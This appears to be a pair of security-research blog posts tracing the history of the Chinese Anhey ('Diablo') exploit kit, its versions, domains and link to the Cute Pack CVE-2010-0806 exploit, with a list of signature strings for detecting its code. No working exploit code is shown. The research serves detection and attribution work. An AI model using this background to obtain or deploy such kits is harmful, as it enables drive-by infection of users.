The appearance of the kits change again with the new Anhey/Cuteqq Diablo Exploit Kit Version 1.0.  The caricature of the Devil was replaced with a blue and silver globe and the fiery orange background was replaced by blue and pink pastels.  The name Diablo Working Group, however, remained unchanged.  The name of the executable file was EvilCute.exe.  The string EVILCUTE is also frequently found in the code generated by Anhey kits.  A 2009 version 1.1 was created on 20090410 and a 2009 version 2.4 was created on 20090926.  Finally, a 2009 version 4.0 was created on 20091030.  The executable file for the version 4 kit was named AH2009.exe.  Visually, this version had more in common with the 2008 R&D Beta than with the previous three 2009 kits.

Anhey2008v1 Anhey2009v1_1

anhey2009v2_4anhey2009v4

The final Anhey kits were released sometime in mid-2010 and were described in detail in Val Smith’s white paper.  The appearance of the kit changed once again but was still enabled by Skin++.  Interestingly, the references to Cuteqq.cn were changed to Anhey.com.  The IP address and domain registration information for Anhey.com was the same as the IP address and domain registration information for Cuteqq.cn.  Both domains are no longer active.

anhey2010ProE5In conclusion, the Anhey or Diablo Network Trojan Exploit Kit appeared to have evolved from the Cuteqq.cn Ultimate Network Trojan Code Generator 6 during the second half of 2007.  One of the original contributors may have used the name CHILAM.  One of these early kits referenced a company called the Foreign Land Team (F.L.T.).  The first actual Anhey kit was released in January of 2008.  It was created and promoted as a joint effort between the Anhey Working Group and the well-known Hacker X-Files Group, as described by an individual called LZHacker.  By mid-2008, the appearance of the product user interface was enhanced by through the use a third party application called Skin++.  All subsequent released included Skin++ (SkinPPWLT.dll).  In 2010, the domain name Cuteqq.cn was swapped for Anhey.com.  The last known release of an Anhey Exploit Kit was in June of 2010.  The kits are still available for download on Chinese language hacker sites and often offered in conjunction with tutorial and training courses.

My collection of Anhey Exploit Kit screen captures is available here for download.

References:

Balancing the Pwn Trade Deficit

Solving the puzzle: mass SQL injection+0day flash drive-by download attacks robint.us and 2677.in

XiaoLin Security Team 2008-4-30

The United Nations Serving Malware

 

A Second Look at Cute Pack

Image

In February 2012, the Kahu Security Blog described three new Chinese exploit packs -  Cute Pack, Yang Pack and Zhi Zhu Pack.   Interest in the Yang Pack and Zhi Zhu Pack continued throughout 2012.  By the end of 2012, Yang and Zhi Zhu earned a position at Contagio’s Exploit Pack Table.  Cute Pack, however, seems to have been forgotten by all but the very most obscure bloggers.

The actual name of the kit that generated the Cute Pack first stage exploit is included as a variable name in the CUTE-IE.HTML file.  The name ANHEYWANGMA is a phonetic representation of the Chinese characters “暗黑网马”.   The characters 暗黑 (Ànhēi or Anhey) translate to “Diablo” or “Darkness”.  The characters 网马 (Wǎng mǎ) translate to “Network Horse” or “Network Trojan”.  Wang Ma is a commonly used term found in Chinese language hacker sites to describe browser-based exploits that originate from legitimate websites infected by SQL injection or ARP cache poisoning.

Val Smith, Anthony Lai and Colin Ames provided a detailed description of the Anhey Exploit Kit during the DEFCON 2010 conference and in their July 2010 paper entitled “Balancing the Pwn Trade Deficit”.  The paper includes a description of the CVE-2010-0806 exploit files CUTE-IE.HTML, PACK.JS and PACK.CSS.  The files were generated from an Anhey Exploit Kit (ah_IE_0day.exe) shown below.  The application name displayed at the top of the window translates to “Diablo (Anhey) IE 0DAY Network Trojan Code Generator”.  The characters in the graphic display translate to “Diablo (Anhey) Working Group”.  The properties for the executable include a reference to the “Cuteqq Software Team” and a modification date of 12 January 2010 – just three days after the CVE-2010-0806 was disclosed by Microsoft.

ah_ie-0day

The content of the Anhey-generated version of CUTE-IE.HTML is almost identical to the  CUTE-IE.HTML code fragment provided by Kahu.  The only visible difference between the two files, other than whitespace and line breaks, is in the variable SSS.  The Anhey-generated value for the variable SSS includes a JS pop-up box advertising the Anhey Exploit kit after the exploit is triggered.  Translated, the pop-up read “Anhey Network Trojan QQ: 443 816 808 determined run overflow!”.  The decoded version of the decimal ASCII values found in Variable SSS and the corresponding code fragments are shown below.

exploitcode1

KAHU_DEFCON10

The Anhey Exploit Kit referenced above was designed specifically for the CVE-2010-0806 exploit.  Other versions of the Anhey kits include several other exploits.  Screen shots of the full Anhey “VIP 2010 Professional Edition Five” kit and corresponding Cuteqq.cn web site are reproduced from Val Smith’s paper and shown below.

anhey2010ProE5

cuteqqcn

The authors of this kit do not seem to pass up any opportunities to let their name be known.  In addition to the explicit use of the exploit kit name, ANHEYWANGMA, as a variable name, the authors have left several other calling cards in their code.  The exploit code generated from these kits employ several signatures.  A few of these signatures are listed below.

ANHEYWM          Shortened version of ANHEYWANGMA
AHWM                 Shortened version of ANHEYWM or ANHEYWANGMA
ANHIE                 Alternate spelling of ANHEY
CUTEQQ            The original Anhey (Diablo) original website, CUTEQQ.CN
EVILCUTE          Possible a combination of the words “Anhey” and “Cute”
CUTEPOWER    Power
CUTEMONEY    Wealth
CUTESHINE       Knowledge

I have not seen any new editions to the Anhey kit since May 2010.  So, why did I bother investigating a dead exploit kit?  It is possible that the Anhey Exploit kit may have evolved into newer kits that continue to incorporate more recent exploits.  Possible successors to the Anhey kit may include the Yang, Zhi Zhu, Kaixin and Dadong Exploit Kits.  It will be interesting to see if any of the peculiarities of the Anhey kit are included in the more recent Chinese exploit kits as well.

References:

Balancing the Pwn Trade Deficit

Chinese Exploit Packs

Another Chinese Pack

Common Exploit Kits 2012 Poster